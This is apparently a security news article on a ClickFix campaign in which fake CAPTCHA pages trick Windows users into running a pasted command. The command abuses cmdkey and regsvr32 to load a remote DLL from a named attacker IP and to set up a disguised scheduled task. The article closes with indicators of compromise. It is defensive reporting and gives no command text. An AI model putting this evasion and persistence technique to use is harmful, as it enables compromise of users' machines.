New ClickFix attack Hides in Native Windows Tools to Reduce Detection Risk

Summary

A new ClickFix social engineering campaign discovered by CyberProof tricks users into executing malicious commands through fake CAPTCHA pages, leveraging native Windows tools (cmdkey and regsvr32) to maintain persistence and evade detection. The attack chains multiple actions to fetch a malicious DLL (demo.dll) from a remote server, which establishes scheduled tasks retrieving instructions from a remote XML file. By using trusted Windows binaries (LOLBins) and avoiding obvious malware detection signatures, attackers achieve high stealth while maintaining execution reliability.

Full text

Security Scams and FraudNew ClickFix attack Hides in Native Windows Tools to Reduce Detection Risk Fake CAPTCHA ClickFix attack tricks users into running malicious commands, using cmdkey and regsvr32 to maintain persistence and avoid detection on Windows byDeeba AhmedApril 24, 20263 minute read A new ClickFix attack campaign uses fake CAPTCHA pages to trick users into running malicious commands. Learn how hackers use cmdkey and regsvr32 to maintain persistence and evade detection on Windows systems. CyberProof Threat Research Team has found a new campaign where hackers are compromising Windows computers using the ClickFix method. This technique is not new, but it is becoming much more common. Hackers have used similar ClickFix lures to impersonate Google Meet, Microsoft Word, and even GitHub to trick people into running malicious code. Hackread.com has been consistently reporting the growing involvement of this technique in attacks, as scammers find it to be a very reliable way to bypass advanced security tools. This latest version of the scam was found by CyberProof in April 2026. The CAPTCHA Trick The social engineering-based attack generally starts with a fake CAPTCHA-like security check or a browser error, which informs the user that to fix the issue, they must press the Windows key and R (Win + R), and paste a specific command. According to CyberProof, this attack version is different because it avoids common tools like PowerShell or rundll32, which security software can easily spot, and instead, uses two other native Windows utilities- cmdkey and regsvr32. Using these LOLBins (trusted Windows files already existing on the computer), the hackers can operate without alerting the user. And, since the user manually starts the process, the computer assumes the activity is legitimate. The malicious command even includes a fake ‘I am not a robot’ comment to make the code look like a real Cloudflare security check. Using Hidden Files When this command is pasted, it quickly connects to a server at this IP address- 151.245.195.142, using a UNC path. From there, it fetches a file named demo.dll. This is a 64-bit Windows DLL file designed to run silently. It uses a function called DllRegisterServer to launch a hidden CreateProcessA call, which then sets up a scheduled task on the computer so the hackers can maintain persistence. The attackers named this task RunNotepadNow to make it appear as a boring, everyday background process. Another interesting part is that the task instructions are not even kept on the computer, but retrieved from a remote file called 777.xml. Researchers noted that by using these trusted tools, the attacker “achieves a high degree of stealth while maintaining execution reliability.” “In this campaign, victims are socially engineered into executing a single malicious command via the Windows Run dialog (Win + R). That command chains multiple actions to stage credentials, retrieve a remote DLL, and execute it silently. By relying exclusively on trusted Windows components and avoiding obvious malware drops, the attacker achieves a high degree of stealth while maintaining execution reliability,” the report reads. (Credit: CyberProof) Why is it Hard to Catch Hackers have stored that XML file on their own servers. This allows them to change instructions whenever they want without sending a new file to update the attack. Researchers stated that at the time of publishing this research, the server at 151.245.195.142 was already down, making it hard to identify exactly what the hackers were planning to do next. CyberProof researchers suggest the best way to stay safe is to never copy-paste code from a website into your computer’s Run box, no matter how real the CAPTCHA looks. Deeba Ahmed Deeba is a veteran cybersecurity reporter at Hackread.com with over a decade of experience covering cybercrime, vulnerabilities, and security events. Her expertise and in-depth analysis make her a key contributor to the platform’s trusted coverage. View Posts CaptchaClickFixCyber AttackCybersecurityFraudMalwareScamWindows Leave a Reply Cancel reply View Comments (0) Related Posts Read More Security 11 Top DDoS Attack Protection and Mitigation Companies in 2023 A DDoS attack can cripple your servers. Here's a list of DDoS mitigation companies in 2023, along with a brief overview of the DDoS attacks they have effectively mitigated. byWaqas Read More News Cyber Attacks Malware Security Chinese APT Group Hits Air-Gapped Systems in Europe with Malware Industrial organizations in Eastern Europe are the prime targets of this data-harvesting campaign. byDeeba Ahmed Security Cyber Attacks Hackers halted Argentina borders service after ransomware attack Argentina's immigration agency network was compromised with the NetWalker ransomware attack. byDeeba Ahmed Cyber Crime Malware Security New Malware Campaign Launched to Disrupt Winter Olympics 2018 The 2018 Olympic Winter Games will be held in Pyeongchang in February 2018 but malware attacks against the event… byUzair Amir

Indicators of Compromise

• ip — 151.245.195.142
• malware — demo.dll
• malware — ClickFix

Entities